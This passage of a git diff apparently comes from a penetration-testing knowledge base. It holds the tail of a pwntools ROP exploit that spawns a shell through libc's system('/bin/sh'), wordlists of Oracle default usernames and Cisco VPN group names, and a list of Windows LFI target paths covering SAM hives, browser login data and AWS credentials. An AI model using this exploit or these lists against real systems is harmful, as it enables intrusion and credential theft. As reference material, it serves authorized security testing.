+### GET SHELL with known LIBC ###
+#################################
+BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh
+SYSTEM = libc.sym["system"]
+EXIT = libc.sym["exit"]
+
+log.info("bin/sh %s " % hex(BINSH))
+log.info("system %s " % hex(SYSTEM))
+
+rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
+
+p.clean()
+p.sendline(rop2)
+
+##### Interact with the shell #####
+p.interactive() #Interact with the conenction
\ No newline at end of file
diff --git a/.gitbook/assets/users-oracle.txt b/.gitbook/assets/users-oracle.txt
new file mode 100644
index 00000000..f95874be
--- /dev/null
+++ b/.gitbook/assets/users-oracle.txt
@@ -0,0 +1,1369 @@
+AASH
+ABA1
+abm
+ABM
+adams
+ADAMS
+adldemo
+ADLDEMO
+admin
+ADMIN
+administrator
+ADMINISTRATOR
+AD_MONITOR
+ADS
+ADSEUL_US
+ahl
+AHL
+ahm
+AHM
+ak
+AK
+AL
+ALA1
+alhro
+ALHRO
+alhrw
+ALHRW
+ALLUSERS
+alr
+ALR
+AMA1
+AMA2
+AMA3
+AMA4
+AMF
+ams
+AMS
+AMS1
+AMS2
+AMS3
+AMS4
+AMSYS
+amv
+AMV
+AMW
+andy
+ANDY
+ANNE
+anonymous
+ANONYMOUS
+AOLDEMO
+ap
+AP
+APA1
+APA2
+APA3
+APA4
+APPLEAD
+applmgr
+APPLMGR
+applsys
+APPLSYS
+applsyspub
+APPLSYSPUB
+applysyspub
+APPLYSYSPUB
+apps
+APPS
+apps_mrc
+APPS_MRC
+appuser
+APPUSER
+APS1
+APS2
+APS3
+APS4
+aq
+AQ
+aqdemo
+AQDEMO
+aqjava
+AQJAVA
+aquser
+AQUSER
+ar
+AR
+ARA1
+ARA2
+ARA3
+ARA4
+ARS1
+ARS2
+ARS3
+ARS4
+ART
+asf
+ASF
+asg
+ASG
+asl
+ASL
+ASN
+aso
+ASO
+asp
+ASP
+ast
+AST
+atm
+ATM
+AUC_GUEST
+audiouser
+AUDIOUSER
+aurora$jis$utility$
+AURORA$JIS$UTILITY$
+aurora$orb$unauthenticated
+AURORA$ORB$UNAUTHENTICATED
+AUTHORIA
+ax
+AX
+az
+AZ
+B2B
+BAM
+bc4j
+BC4J
+BCA1
+BCA2
+ben
+BEN
+bic
+BIC
+bil
+BIL
+bim
+BIM
+bis
+BIS
+biv
+BIV
+bix
+BIX
+blake
+BLAKE
+blewis
+BLEWIS
+BMEADOWS
+BNE
+bom
+BOM
+BP01
+BP02
+BP03
+BP04
+BP05
+BP06
+brio_admin
+BRIO_ADMIN
+brugernavn
+BRUGERNAVN
+brukernavn
+BRUKERNAVN
+bsc
+BSC
+bug_reports
+BUG_REPORTS
+BUYACCT
+BUYAPPR1
+BUYAPPR2
+BUYAPPR3
+BUYER
+BUYMTCH
+calvin
+CALVIN
+CAMRON
+CANDICE
+CARL
+CARLY
+CARMEN
+CARRIECONYERS
+CATADMIN
+catalog
+CATALOG
+cct
+CCT
+cdemo82
+CDEMO82
+cdemocor
+CDEMOCOR
+cdemorid
+CDEMORID
+cdemoucb
+CDEMOUCB
+cdouglas
+CDOUGLAS
+ce
+CE
+CEASAR
+centra
+CENTRA
+central
+CENTRAL
+CFD
+CHANDRA
+CHARLEY
+CHRISBAKER
+CHRISTIE
+cids
+CIDS
+CINDY
+cis
+CIS
+cisinfo
+CISINFO
+clark
+CLARK
+CLAUDE
+CLINT
+CLN
+cn
+CN
+CNCADMIN
+company
+COMPANY
+compiere
+COMPIERE
+CONNIE
+CONNOR
+CORY
+cqschemauser
+CQSCHEMAUSER
+cquserdbuser
+CQUSERDBUSER
+CRM1
+CRM2
+crp
+CRP
+CRPB733
+CRPCTL
+CRPDTA
+cs
+CS
+CSADMIN
+CSAPPR1
+csc
+CSC
+csd
+CSD
+CSDUMMY
+cse
+CSE
+csf
+CSF
+csi
+CSI
+csl
+CSL
+CSM
+csmig
+CSMIG
+csp
+CSP
+csr
+CSR
+css
+CSS
+ctxdemo
+CTXDEMO
+ctxsys
+CTXSYS
+CTXTEST
+cua
+CUA
+cue
+CUE
+cuf
+CUF
+cug
+CUG
+cui
+CUI
+cun
+CUN
+cup
+CUP
+cus
+CUS
+cz
+CZ
+data_schema
+DATA_SCHEMA
+DAVIDMORGAN
+dbi
+DBI
+dbsnmp
+DBSNMP
+dbvision
+DBVISION
+DCM
+DD7333
+DD7334
+DD810
+DD811
+DD812
+DD9
+DDB733
+DDD
+ddic
+DDIC
+demo
+DEMO
+demo8
+DEMO8
+demo9
+DEMO9
+des
+DES
+des2k
+DES2K
+dev2000_demos
+DEV2000_DEMOS
+DEVB733
+DEVUSER
+DGRAY
+diane
+DIANE
+dip
+DIP
+DISCOVERER5
+discoverer_admin
+DISCOVERER_ADMIN
+DKING
+DLD
+DMADMIN
+DMATS
+DMS
+dmsys
+DMSYS
+DOM
+dpf
+DPF
+DPOND
+dsgateway
+DSGATEWAY
+dssys
+DSSYS
+dtsp
+DTSP
+DV7333
+DV7334
+DV810
+DV811
+DV812
+DV9
+DVP1
+eaa
+EAA
+eam
+EAM
+earlywatch
+EARLYWATCH
+east
+EAST
+ec
+EC
+ecx
+ECX
+EDR
+EDWEUL_US
+EDWREP
+EGC1
+EGD1
+EGM1
+EGO
+EGR1
+ejb
+EJB
+ejsadmin
+EJSADMIN
+emp
+EMP
+END1
+eng
+ENG
+eni
+ENI
+ENM1
+ENS1
+ENTMGR_CUST
+ENTMGR_PRO
+ENTMGR_TRAIN
+EOPP_PORTALADM
+EOPP_PORTALMGR
+EOPP_USER
+estoreuser
+ESTOREUSER
+EUL_US
+event
+EVENT
+evm
+EVM
+EXA1
+EXA2
+EXA3
+EXA4
+example
+EXAMPLE
+exfsys
+EXFSYS
+EXS1
+EXS2
+EXS3
+EXS4
+extdemo
+EXTDEMO
+extdemo2
+EXTDEMO2
+fa
+FA
+fem
+FEM
+FIA1
+fii
+FII
+finance
+FINANCE
+finprod
+FINPROD
+flm
+FLM
+fnd
+FND
+FNI1
+FNI2
+foo
+FOO
+FPA
+fpt
+FPT
+frm
+FRM
+frosty
+FROSTY
+FTA1
+fte
+FTE
+FUN
+fv
+FV
+FVP1
+GALLEN
+GCA1
+GCA2
+GCA3
+GCA9
+GCMGR1
+GCMGR2
+GCMGR3
+GCS
+GCS1
+GCS2
+GCS3
+GEORGIAWINE
+gl
+GL
+GLA1
+GLA2
+GLA3
+GLA4
+GLS1
+GLS2
+GLS3
+GLS4
+gma
+GMA
+GM_AWDA
+GM_COPI
+gmd
+GMD
+GM_DPHD
+gme
+GME
+gmf
+GMF
+gmi
+GMI
+gml
+GML
+GM_MLCT
+gmp
+GMP
+GM_PLADMA
+GM_PLADMH
+GM_PLCCA
+GM_PLCCH
+GM_PLCOMA
+GM_PLCOMH
+GM_PLCONA
+GM_PLCONH
+GM_PLNSCA
+GM_PLNSCH
+GM_PLSCTA
+GM_PLSCTH
+GM_PLVET
+gms
+GMS
+GM_SPO
+GM_STKH
+gpfd
+GPFD
+gpld
+GPLD
+gr
+GR
+GUEST
+hades
+HADES
+HCC
+hcpark
+HCPARK
+HHCFO
+hlw
+HLW
+hr
+HR
+hri
+HRI
+hvst
+HVST
+hxc
+HXC
+hxt
+HXT
+IA
+iba
+IBA
+IBC
+ibe
+IBE
+ibp
+IBP
+ibu
+IBU
+iby
+IBY
+icdbown
+ICDBOWN
+icx
+ICX
+idemo_user
+IDEMO_USER
+ieb
+IEB
+iec
+IEC
+iem
+IEM
+ieo
+IEO
+ies
+IES
+ieu
+IEU
+iex
+IEX
+ifssys
+IFSSYS
+igc
+IGC
+igf
+IGF
+igi
+IGI
+igs
+IGS
+igw
+IGW
+imageuser
+IMAGEUSER
+imc
+IMC
+imedia
+IMEDIA
+imt
+IMT
+INS1
+INS2
+#internal
+internal
+#INTERNAL
+INTERNAL
+inv
+INV
+IP
+ipa
+IPA
+ipd
+IPD
+iplanet
+IPLANET
+isc
+ISC
+ISTEWARD
+itg
+ITG
+ja
+JA
+jake
+JAKE
+JD7333
+JD7334
+JD9
+JDE
+JDEDBA
+je
+JE
+jg
+JG
+jill
+JILL
+jl
+JL
+JL 
+jmuser
+JMUSER
+john
+JOHN
+JOHNINARI
+jones
+JONES
+jtf
+JTF
+JTI
+jtm
+JTM
+JTR
+jts
+JTS
+JUNK_PS
+JUSTOSHUM
+jward
+JWARD
+KELLYJONES
+KEVINDONS
+KPN
+kwalker
+KWALKER
+l2ldemo
+L2LDEMO
+LADAMS
+LBA
+lbacsys
+LBACSYS
+LDQUAL
+LHILL
+librarian
+LIBRARIAN
+LNS
+LQUINCY
+LSA
+manprod
+MANPROD
+mark
+MARK
+mascarm
+MASCARM
+master
+MASTER
+mddata
+MDDATA
+mddemo
+MDDEMO
+mddemo_clerk
+MDDEMO_CLERK
+mddemo_mgr
+MDDEMO_MGR
+mdsys
+MDSYS
+me
+ME
+mfg
+MFG
+mgr
+MGR
+MGR1
+MGR2
+MGR3
+MGR4
+mgwuser
+MGWUSER
+migrate
+MIGRATE
+MIKEIKEGAMI
+miller
+MILLER
+MJONES
+MLAKE
+MM1
+MM2
+MM3
+MM4
+MM5
+MMARTIN
+mmo2
+MMO2
+MOBILEADMIN
+modtest
+MODTEST
+moreau
+MOREAU
+mrp
+MRP
+msc
+MSC
+msd
+MSD
+mso
+MSO
+msr
+MSR
+MST
+mtssys
+MTSSYS
+mts_user
+MTS_USER
+mwa
+MWA
+mxagent
+MXAGENT
+names
+NAMES
+NEILKATSU
+neotix_sys
+NEOTIX_SYS
+nneul
+NNEUL
+nomeutente
+NOMEUTENTE
+nome_utilizador
+NOME_UTILIZADOR
+nom_utilisateur
+NOM_UTILISATEUR
+nume_utilizator
+NUME_UTILIZATOR
+oas_public
+OAS_PUBLIC
+OBJ7333
+OBJ7334
+OBJB733
+OCA
+ocitest
+OCITEST
+ocm_db_admin
+OCM_DB_ADMIN
+odm
+ODM
+odm_mtr
+ODM_MTR
+ods
+ODS
+odscommon
+ODSCOMMON
+ods_server
+ODS_SERVER
+oe
+OE
+oemadm
+OEMADM
+oemrep
+OEMREP
+okb
+OKB
+okc
+OKC
+oke
+OKE
+oki
+OKI
+OKL
+oko
+OKO
+okr
+OKR
+oks
+OKS
+okx
+OKX
+OL810
+OL811
+OL812
+OL9
+olapdba
+OLAPDBA
+olapsvr
+OLAPSVR
+olapsys
+OLAPSYS
+omwb_emulation
+OMWB_EMULATION
+ont
+ONT
+oo
+OO
+openspirit
+OPENSPIRIT
+opi
+OPI
+ORABAM
+ORABAMSAMPLES
+ORABPEL
+oracache
+ORACACHE
+oracle
+ORACLE
+oradba
+ORADBA
+ORAESB
+ORAOCA_PUBLIC
+oraprobe
+ORAPROBE
+oraregsys
+ORAREGSYS
+ORASAGENT
+orasso
+ORASSO
+orasso_ds
+ORASSO_DS
+orasso_pa
+ORASSO_PA
+orasso_ps
+ORASSO_PS
+orasso_public
+ORASSO_PUBLIC
+orastat
+ORASTAT
+orcladmin
+ORCLADMIN
+ordcommon
+ORDCOMMON
+ordplugins
+ORDPLUGINS
+ordsys
+ORDSYS
+ose$http$admin
+OSE$HTTP$ADMIN
+osm
+OSM
+osp22
+OSP22
+ota
+OTA
+outln
+OUTLN
+owa
+OWA
+OWAPUB
+owa_public
+OWA_PUBLIC
+owf_mgr
+OWF_MGR
+owner
+OWNER
+ozf
+OZF
+ozp
+OZP
+ozs
+OZS
+pa
+PA
+PABLO
+PAIGE
+PAM
+panama
+PANAMA
+PARRISH
+PARSON
+PAT
+PATORILY
+PATRICKSANCHEZ
+patrol
+PATROL
+PATSY
+paul
+PAUL
+PAULA
+PAXTON
+PCA1
+PCA2
+PCA3
+PCA4
+PCS1
+PCS2
+PCS3
+PCS4
+PD7333
+PD7334
+PD810
+PD811
+PD812
+PD9
+PDA1
+PEARL
+PEG
+PENNY
+PEOPLE
+PERCY
+perfstat
+PERFSTAT
+PERRY
+perstat
+PERSTAT
+PETE
+PEYTON
+PHIL
+PJI
+pjm
+PJM
+planning
+PLANNING
+plex
+PLEX
+plsql
+PLSQL
+pm
+PM
+pmi
+PMI
+pn
+PN
+po
+PO
+po7
+PO7
+po8
+PO8
+poa
+POA
+POLLY
+pom
+POM
+PON
+PORTAL
+portal30
+PORTAL30
+portal30_admin
+PORTAL30_ADMIN
+portal30_demo
+PORTAL30_DEMO
+portal30_ps
+PORTAL30_PS
+portal30_public
+PORTAL30_PUBLIC
+portal30_sso
+PORTAL30_SSO
+portal30_sso_admin
+PORTAL30_SSO_ADMIN
+portal30_sso_ps
+PORTAL30_SSO_PS
+portal30_sso_public
+PORTAL30_SSO_PUBLIC
+PORTAL_APP
+portal_demo
+PORTAL_DEMO
+PORTAL_PUBLIC
+portal_sso_ps
+PORTAL_SSO_PS
+pos
+POS
+powercartuser
+POWERCARTUSER
+PPM1
+PPM2
+PPM3
+PPM4
+PPM5
+primary
+PRIMARY
+PRISTB733
+PRISTCTL
+PRISTDTA
+PRODB733
+PRODCTL
+PRODDTA
+PRODUSER
+PROJMFG
+PRP
+PS
+PS810
+PS810CTL
+PS810DTA
+PS811
+PS811CTL
+PS811DTA
+PS812
+PS812CTL
+PS812DTA
+psa
+PSA
+psb
+PSB
+PSBASS
+PSEM
+PSFT
+PSFTDBA
+psp
+PSP
+PTADMIN
+PTCNE
+PTDMO
+PTE
+PTESP
+PTFRA
+PTG
+PTGER
+PTJPN
+PTUKE
+PTUPG
+PTWEB
+PTWEBSERVER
+pubsub
+PUBSUB
+pubsub1
+PUBSUB1
+pv
+PV
+PY7333
+PY7334
+PY810
+PY811
+PY812
+PY9
+qa
+QA
+qdba
+QDBA
+QOT
+qp
+QP
+QRM
+qs
+QS
+qs_adm
+QS_ADM
+qs_cb
+QS_CB
+qs_cbadm
+QS_CBADM
+qs_cs
+QS_CS
+qs_es
+QS_ES
+qs_os
+QS_OS
+qs_ws
+QS_WS
+re
+RE
+RENE
+repadmin
+REPADMIN
+rep_manager
+REP_MANAGER
+reports
+REPORTS
+reports_user
+REPORTS_USER
+rep_owner
+REP_OWNER
+rep_user
+REP_USER
+RESTRICTED_US
+rg
+RG
+rhx
+RHX
+rla
+RLA
+rlm
+RLM
+RM1
+RM2
+RM3
+RM4
+RM5
+rmail
+RMAIL
+rman
+RMAN
+ROB
+RPARKER
+rrs
+RRS
+RWA1
+SALLYH
+SAM
+sample
+SAMPLE
+sap
+SAP
+sapr3
+SAPR3
+SARAHMANDY
+SCM1
+SCM2
+SCM3
+SCM4
+scott
+SCOTT
+SDAVIS
+sdos_icsap
+SDOS_ICSAP
+secdemo
+SECDEMO
+SEDWARDS
+SELLCM
+SELLER
+SELLTREAS
+serviceconsumer1
+SERVICECONSUMER1
+SERVICES
+SETUP
+sh
+SH
+SID
+si_informtn_schema
+SI_INFORMTN_SCHEMA
+siteminder
+SITEMINDER
+SKAYE
+SKYTETSUKA
+slide
+SLIDE
+SLSAA
+SLSMGR
+SLSREP
+spierson
+SPIERSON
+SRABBITT
+SRALPHS
+SRAY
+SRIVERS
+SSA1
+SSA2
+SSA3
+SSC1
+SSC2
+SSC3
+SSOSDK
+ssp
+SSP
+SSS1
+starter
+STARTER
+strat_user
+STRAT_USER
+SUPPLIER
+SVM7333
+SVM7334
+SVM810
+SVM811
+SVM812
+SVM9
+SVMB733
+SVP1
+swpro
+SWPRO
+swuser
+SWUSER
+SY810
+SY811
+SY812
+SY9
+sympa
+SYMPA
+sys
+SYS
+SYS7333
+SYS7334
+sysadm
+SYSADM
+sysadmin
+SYSADMIN
+SYSB733
+sysman
+SYSMAN
+system
+SYSTEM
+tahiti
+TAHITI
+talbot
+TALBOT
+TDEMARCO
+tdos_icsap
+TDOS_ICSAP
+tec
+TEC
+test
+TEST
+TESTCTL
+TESTDTA
+testpilot
+TESTPILOT
+test_user
+TEST_USER
+thinsample
+THINSAMPLE
+tibco
+TIBCO
+tip37
+TIP37
+TRA1
+tracesvr
+TRACESVR
+travel
+TRAVEL
+TRBM1
+TRCM1
+TRDM1
+TRRM1
+tsdev
+TSDEV
+tsuser
+TSUSER
+turbine
+TURBINE
+TWILLIAMS
+UDDISYS
+ultimate
+ULTIMATE
+um_admin
+UM_ADMIN
+um_client
+UM_CLIENT
+user
+USER
+user0
+USER0
+user1
+USER1
+user2
+USER2
+user3
+USER3
+user4
+USER4
+user5
+USER5
+user6
+USER6
+user7
+USER7
+user8
+USER8
+user9
+USER9
+user_name
+USER_NAME
+usuario
+USUARIO
+utility
+UTILITY
+utlbstatu
+UTLBSTATU
+vea
+VEA
+veh
+VEH
+vertex_login
+VERTEX_LOGIN
+VIDEO31
+VIDEO4
+VIDEO5
+videouser
+VIDEOUSER
+vif_developer
+VIF_DEVELOPER
+viruser
+VIRUSER
+VP1
+VP2
+VP3
+VP4
+VP5
+VP6
+vpd_admin
+VPD_ADMIN
+vrr1
+VRR1
+WAA1
+WAA2
+WCRSYS
+webcal01
+WEBCAL01
+webdb
+WEBDB
+webread
+WEBREAD
+websys
+WEBSYS
+webuser
+WEBUSER
+WENDYCHO
+west
+WEST
+wfadmin
+WFADMIN
+wh
+WH
+wip
+WIP
+WIRELESS
+wkadmin
+WKADMIN
+wkproxy
+WKPROXY
+wksys
+WKSYS
+wk_test
+WK_TEST
+wkuser
+WKUSER
+wms
+WMS
+wmsys
+WMSYS
+wob
+WOB
+wps
+WPS
+wsh
+WSH
+wsm
+WSM
+www
+WWW
+wwwuser
+WWWUSER
+xademo
+XADEMO
+xdb
+XDB
+XDO
+xdp
+XDP
+xla
+XLA
+XLE
+XNB
+xnc
+XNC
+xni
+XNI
+xnm
+XNM
+xnp
+XNP
+xns
+XNS
+xprt
+XPRT
+xtr
+XTR
+YCAMPOS
+YSANCHEZ
+ZFA
+ZPB
+ZSA
+ZX
diff --git a/.gitbook/assets/vncpwd.zip b/.gitbook/assets/vncpwd.zip
new file mode 100644
index 00000000..25737271
Binary files /dev/null and b/.gitbook/assets/vncpwd.zip differ
diff --git a/.gitbook/assets/vpnids.txt b/.gitbook/assets/vpnids.txt
new file mode 100644
index 00000000..9d70dde7
--- /dev/null
+++ b/.gitbook/assets/vpnids.txt
@@ -0,0 +1,160 @@
+GroupVPN
+Group-VPN
+EZ
+ez
+3000
+5000
+abc
+ABC
+RemoteAccess
+RemoteAccessVPN
+remoteaccessvpn
+access
+asa
+ASA
+pix
+PIX
+asa_vpn
+ASA_vpn
+ASA_VPN
+PIX_VPN
+pix_vpn
+vpn_asa
+vpn_pix
+VPN_ASA
+VPN_PIX
+aimatch
+asset
+assetlink
+backup
+backup1
+backup-server
+cisco
+clientvpn
+client-vpn
+data
+dataflux
+DefaultL2LGroup
+DefaultRAGroup
+DefaultWEBVPNGroup
+dfltgrppolicy
+DfltGrpPolicy
+dmz
+dmzvpn
+enter
+ENTER
+external
+externalvpn
+extvpn
+ext-vpn
+ezvpn
+ezVPN
+EZvpn
+EZVPN
+ezvpn-client
+EZVPN_GROUP
+failover
+group
+Group
+group1
+Group1
+group2
+Group2
+group3
+Group3
+group4
+Group4
+group5
+GROUP_EZVPN
+groupnew
+GroupPolicy
+GroupPolicy1
+GroupPolicy2
+GroupPolicy3
+GroupPolicy4
+GroupPolicy5
+groupvpn
+group-vpn
+hq
+hqvpn
+ideas
+ike
+inside
+internal
+internalvpn
+internal-vpn
+intvpn
+int-vpn
+ipsec
+ipsec-ra
+ipsec-tuneglgroup1
+ipsec-tunnelgroup
+ipsec-tunnelgroup2
+jmp
+link
+mygroup
+myGroup
+myGROUP
+MyGroup
+new
+newgroup
+old
+outside
+picosearch
+primary
+primary-vpn
+private
+public
+ravpn
+ra-vpn
+remote
+Remote
+remote-access
+remotevpn
+remote-vpn
+rename
+root
+sa
+secondary
+secondary_vpn
+secondary-vpn
+Secondary_VPN
+Secondary-VPN
+secure
+superteam
+teragram
+test
+testvpn
+test-vpn
+tunnel
+vpn
+vpngroup
+vpn-group
+VPNGroup
+vpnint
+vpn-int
+vpn_primary
+vpn-primary
+VPN_primary
+VPN_Primary
+VPN-Primary
+vpnremote
+vpn-remote
+vpntest
+vpn-test
+VPNtest
+VPN-test
+VPN-Test
+vpntunnel
+vsticorp
+webvpn
+xxx
+XXX
+manualVPN
+TunnelGroup1
+TunnelGroup2
+TunnelGroup3
+WAN GROUP
+WAN
+WANVPN
+VPNGROUP
\ No newline at end of file
diff --git a/.gitbook/assets/winlfi.txt b/.gitbook/assets/winlfi.txt
new file mode 100644
index 00000000..bd0b3746
--- /dev/null
+++ b/.gitbook/assets/winlfi.txt
@@ -0,0 +1,218 @@
+C:/$recycle.bin/s-1-5-18/desktop.ini
+C:/apache2/log/access.log
+C:/apache2/log/access_log
+C:/apache2/log/error.log
+C:/apache2/log/error_log
+C:/apache2/logs/access.log
+C:/apache2/logs/access_log
+C:/apache2/logs/error.log
+C:/apache2/logs/error_log
+C:/apache/log/access.log
+C:/apache/log/access_log
+C:/apache/log/error.log
+C:/apache/log/error_log
+C:/apache/logs/access.log
+C:/apache/logs/access_log
+C:/apache/logs/error.log
+C:/apache/logs/error_log
+C:/apache/php/php.ini
+C:/boot.ini
+C:/documents and settings/administrator/desktop/desktop.ini
+C:/documents and settings/administrator/ntuser.dat
+C:/documents and settings/administrator/ntuser.ini
+C:/home2/bin/stable/apache/php.ini
+C:/home/bin/stable/apache/php.ini
+C:/inetpub/logs/logfiles
+C:/inetpub/wwwroot/global.asa
+C:/inetpub/wwwroot/index.asp
+C:/inetpub/wwwroot/web.config
+C:/log/access.log
+C:/log/access_log
+C:/log/error.log
+C:/log/error_log
+C:/log/httpd/access_log
+C:/log/httpd/error_log
+C:/logs/access.log
+C:/logs/access_log
+C:/logs/error.log
+C:/logs/error_log
+C:/logs/httpd/access_log
+C:/logs/httpd/error_log
+C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
+C:/mysql/bin/my.ini
+C:/mysql/data/hostname.err
+C:/mysql/data/mysql.err
+C:/mysql/data/mysql.log
+C:/mysql/my.cnf
+C:/mysql/my.ini
+C:/opt/xampp/logs/access.log
+C:/opt/xampp/logs/access_log
+C:/opt/xampp/logs/error.log
+C:/opt/xampp/logs/error_log
+C:/php4/php.ini
+C:/php4/sessions/
+C:/php5/php.ini
+C:/php5/sessions/
+C:/php/php.ini
+C:/php/sessions/
+C:/programdata/mcafee/common framework/sitelist.xml
+C:/program files/apache group/apache2/conf/httpd.conf
+C:/program files/apache group/apache/conf/access.log
+C:/program files/apache group/apache/conf/error.log
+C:/program files/apache group/apache/conf/httpd.conf
+C:/program files/apache group/apache/logs/access.log
+C:/program files/apache group/apache/logs/error.log
+C:/program files/filezilla server/filezilla server.xml
+C:/program files/mysql/data/hostname.err
+C:/program files/mysql/data/mysql-bin.log
+C:/program files/mysql/data/mysql.err
+C:/program files/mysql/data/mysql.log
+C:/program files/mysql/my.cnf
+C:/program files/mysql/my.ini
+C:/program files/mysql/mysql server 5.0/data/hostname.err
+C:/program files/mysql/mysql server 5.0/data/mysql-bin.log
+C:/program files/mysql/mysql server 5.0/data/mysql.err
+C:/program files/mysql/mysql server 5.0/data/mysql.log
+C:/program files/mysql/mysql server 5.0/my.cnf
+C:/program files/mysql/mysql server 5.0/my.ini
+C:/program files/mysql/mysql server 5.1/my.ini
+C:/program files (x86)/apache group/apache2/conf/httpd.conf
+C:/program files (x86)/apache group/apache/conf/access.log
+C:/program files (x86)/apache group/apache/conf/error.log
+C:/program files (x86)/apache group/apache/conf/httpd.conf
+C:/program files (x86)/apache group/apache/logs/access.log
+C:/program files (x86)/apache group/apache/logs/error.log
+C:/program files (x86)/filezilla server/filezilla server.xml
+C:/program files (x86)/mysql/data/hostname.err
+C:/program files (x86)/mysql/data/mysql-bin.log
+C:/program files (x86)/mysql/data/mysql.err
+C:/program files (x86)/mysql/data/mysql.log
+C:/program files (x86)/mysql/my.cnf
+C:/program files (x86)/mysql/my.ini
+C:/program files (x86)/mysql/mysql server 5.0/data/hostname.err
+C:/program files (x86)/mysql/mysql server 5.0/data/mysql-bin.log
+C:/program files (x86)/mysql/mysql server 5.0/data/mysql.err
+C:/program files (x86)/mysql/mysql server 5.0/data/mysql.log
+C:/program files (x86)/mysql/mysql server 5.0/my.cnf
+C:/program files (x86)/mysql/mysql server 5.0/my.ini
+C:/program files (x86)/mysql/mysql server 5.1/my.ini
+C:/program files (x86)/xampp/apache/conf/httpd.conf
+C:/program files/xampp/apache/conf/httpd.conf
+C:/sysprep.inf
+C:/sysprep/sysprep.inf
+C:/sysprep/sysprep.xml
+C:/sysprep.xml
+C:/system32/inetsrv/metabase.xml
+C:/system volume information/wpsettings.dat
+C:/unattended.txt
+C:/unattended.xml
+C:/unattend.txt
+C:/unattend.xml
+C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks
+C:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks.bak
+C:/users/administrator/appdata/local/google/chrome/user data/default/cookies
+C:/users/administrator/appdata/local/google/chrome/user data/default/history
+C:/users/administrator/appdata/local/google/chrome/user data/default/last session
+C:/users/administrator/appdata/local/google/chrome/user data/default/login data
+C:/users/administrator/appdata/local/google/chrome/user data/default/preferences
+C:/users/administrator/appdata/local/google/chrome/user data/default/secure preferences
+C:/users/administrator/appdata/local/google/chrome/user data/default/top sites
+C:/users/administrator/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
+C:/users/administrator/.aws/config
+C:/users/administrator/.aws/credentials
+C:/users/administrator/desktop/desktop.ini
+C:/users/administrator/desktop/proof.txt
+C:/users/administrator/.elasticbeanstalk/config 
+C:/users/administrator/ntuser.dat
+C:/users/administrator/ntuser.ini
+C:/windows/csc/v2.0.6/pq
+C:/windows/csc/v2.0.6/sm
+C:/windows/debug/netsetup.log
+C:/windows/explorer.exe
+C:/windows/iis5.log
+C:/windows/iis6.log
+C:/windows/iis7.log
+C:/windows/iis8.log
+C:/windows/notepad.exe
+C:/windows/panther/setupinfo
+C:/windows/panther/setupinfo.bak
+C:/windows/panther/sysprep.inf
+C:/windows/panther/sysprep.xml
+C:/windows/panther/unattended.txt
+C:/windows/panther/unattended.xml
+C:/windows/panther/unattend/setupinfo
+C:/windows/panther/unattend/setupinfo.bak
+C:/windows/panther/unattend/sysprep.inf
+C:/windows/panther/unattend/sysprep.xml
+C:/windows/panther/unattend.txt
+C:/windows/panther/unattend/unattended.txt
+C:/windows/panther/unattend/unattended.xml
+C:/windows/panther/unattend/unattend.txt
+C:/windows/panther/unattend/unattend.xml
+C:/windows/panther/unattend.xml
+C:/windows/php.ini
+C:/windows/repair/sam
+C:/windows/repair/security
+C:/windows/repair/software
+C:/windows/repair/system
+C:/windows/system32/config/appevent.evt
+C:/windows/system32/config/default.sav
+C:/windows/system32/config/regback/default
+C:/windows/system32/config/regback/sam
+C:/windows/system32/config/regback/security
+C:/windows/system32/config/regback/software
+C:/windows/system32/config/regback/system
+C:/windows/system32/config/sam
+C:/windows/system32/config/secevent.evt
+C:/windows/system32/config/security.sav
+C:/windows/system32/config/software.sav
+C:/windows/system32/config/system
+C:/windows/system32/config/system.sa
+C:/windows/system32/config/system.sav
+C:/windows/system32/drivers/etc/hosts
+C:/windows/system32/eula.txt
+C:/windows/system32/inetsrv/config/applicationhost.config
+C:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
+C:/windows/system32/license.rtf
+C:/windows/system32/logfiles/httperr/httperr1.log
+C:/windows/system32/sysprep.inf
+C:/windows/system32/sysprepsysprep.inf
+C:/windows/system32/sysprep/sysprep.xml
+C:/windows/system32/sysprepsysprep.xml
+C:/windows/system32/sysprepunattended.txt
+C:/windows/system32/sysprepunattended.xml
+C:/windows/system32/sysprepunattend.txt
+C:/windows/system32/sysprepunattend.xml
+C:/windows/system32/sysprep.xml
+C:/windows/system32/unattended.txt
+C:/windows/system32/unattended.xml
+C:/windows/system32/unattend.txt
+C:/windows/system32/unattend.xml
+C:/windows/system.ini
+C:/windows/temp/
+C:/windows/windowsupdate.log
+C:/windows/win.ini
+C:/winnt/php.ini
+C:/winnt/win.ini
+C:/xampp/apache/bin/php.ini
+C:/xampp/apache/conf/httpd.conf
+C:/xampp/apache/logs/access.log
+C:/xampp/apache/logs/error.log
+C:/xampp/filezillaftp/filezilla server.xml
+C:/xampp/filezillaftp/logs
+C:/xampp/filezillaftp/logs/access.log
+C:/xampp/filezillaftp/logs/error.log
+C:/xampp/mercurymail/logs/access.log
+C:/xampp/mercurymail/logs/error.log
+C:/xampp/mercurymail/mercury.ini
+C:/xampp/mysql/data/mysql.err
+C:/xampp/phpmyadmin/config.inc
+C:/xampp/phpmyadmin/config.inc.php
+C:/xampp/phpmyadmin/phpinfo.php
+C:/xampp/php/php.ini
+C:/xampp/sendmail/sendmail.ini
+C:/xampp/sendmail/sendmail.log
+C:/xampp/tomcat/conf/tomcat-users.xml
+C:/xampp/tomcat/conf/web.xml
+C:/xampp/webalizer/webalizer.conf
+C:/xampp/webdav/webdav.txt
diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md
new file mode 100644
index 00000000..9da9b64c
--- /dev/null
+++ b/1911-pentesting-fox.md
@@ -0,0 +1,14 @@
+# 1911 - Pentesting fox
+
+And more services:
+
+ubiquiti-discover udp "Ubiquiti Networks Device" 
+
+dht udp "DHT Nodes"
+
+5060 udp sip "SIP/"
+
+![](.gitbook/assets/image%20%28182%29.png)
+
+
+
diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md
new file mode 100644
index 00000000..33f1e351
--- /dev/null
+++ b/6881-udp-pentesting-bittorrent.md
@@ -0,0 +1,2 @@
+# 6881/udp - Pentesting BitTorrent
+
diff --git a/README.md b/README.md
index e69de29b..f225196f 100644
--- a/README.md
+++ b/README.md
